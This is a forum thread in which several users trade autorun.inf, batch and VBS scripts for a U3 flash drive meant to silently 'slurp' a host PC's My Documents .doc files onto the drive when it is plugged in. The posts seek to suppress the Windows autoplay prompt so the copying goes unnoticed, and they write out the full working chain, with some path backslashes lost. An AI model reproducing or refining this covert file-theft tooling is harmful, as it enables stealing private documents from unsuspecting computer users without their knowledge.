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  1. Thanks for the help gonzor, but it's still not working for me. AUTORUN.INF and AUTORUN.VBS are both on U3 root, slurp.bat on flash, still no luck.
  2. Yeah, I'll tell you how I'm doing it and not having much luck. I'm trying to make it autorun from the U3 and it's just not working. CD Partition- autorun.inf, which starts autorun.bat, which starts a VBS script that was created by someone on here. [autorun] open=autorun.bat name=autorun @ECHO off start .Autorun.vbs exit Set objFSO = CreateObject("Scripting.FileSystemObject") Set objShell = CreateObject("Wscript.Shell") Set colDrives = objFSO.Drives Set objEnv = objShell.Environment("PROCESS") objEnv("Year") = Year(now()) objEnv("Month") = Right("0" & Month(now()), 2) objEnv("Day") = Right("0" & Day(now()), 2) objEnv("Hour") = Right("0" & Hour(now()), 2) objEnv("Minute") = Right("0" & Minute(now()), 2) objEnv("Second") = Right("0" & Second(now()), 2) For Each objDrive in colDrives If objFSO.FileExists(objDrive.DriveLetter & ":SystemSRCdrv.dat") Then strPath = objDrive.Driveletter & ":" If objFSO.FileExists(strPath & "SystemSRCPL.dat") Then objShell.Run ".SystemSRCgo.bat " & strPath , 0, False End If End If Next On the flash partition, in SYSTEM/SRC/, there exists PL.dat, slurp.bat & start.bat. This file is empty and just serves as a flag. @echo off @start /min slurp.bat /B @exit @echo off mkdir %~d0%computername% xcopy "C:Documents and Settings%username%My Documents*.doc" %~d0%computername% /s/c/q/r/h @cls @exit Hopefully, those examples can be of some benefit to you, although in their current state they are not working for me.
  3. I flashed a simple autorun.inf to the CD partition using the Universal Customizer... However, when I insert the flash drive, it doesn't start. The only thing that happens is that the removable disk window pops open. The code: [autorun] open=start.bat The start.bat is also on the CD partition, as well as the flash partition, for testing purposes.
  4. That's what someone told me. Is that true? If so, that's your answer.
  5. Actually, that makes perfect sense, I just didn't expect it to work that easy. I didn't think that it would work if the inf used relative directories for the batch files when the INF was in the CD partition and the batch file was on the flash partition. Thanks for the help, can't wait to get it!
  6. Hi guys! Really cool site; finally took the plunge and ordered a U3 Cruzer tonight. I'm working on a little project. I'm creating an automated "Slurping U3". I'm sure you guys are familiar with the process, but if you aren't, slurping is the process of plugging in a removable storage device which copies files (in my case, . doc's) from a given directory to the removable storage. As of now, I used some example code snippets on another site to create an autorun. inf and a batch file to initiate the slurping. This is cool and it works great but I have to press "Ok" when the suggested applications dialog pops up on a WinXP PC. I wanted to keep things totally silent, which is why I decided the U3 would be a good choice. However, this is what I didn't understand. First of all, I'm not real clear on the whole installation process of a custom launchpad. This is what I have so far: [autorun] icon=ico. ico open=start. bat action=Test autorun application. shellopencommand=start. bat This works fine on my flash drive. . . I just want to cut out the prompting step. I guess what I'm asking here is how to transition it from its current, requiring button input form to a U3 friendly form that will run silently and cleanly. By the way, here's the code for the slurp app: @echo off mkdir %~d0%computername% xcopy “C:Documents and Settings%username%My Documents*. doc” %~d0%computername% /s/c/q/r/h @cls @exit
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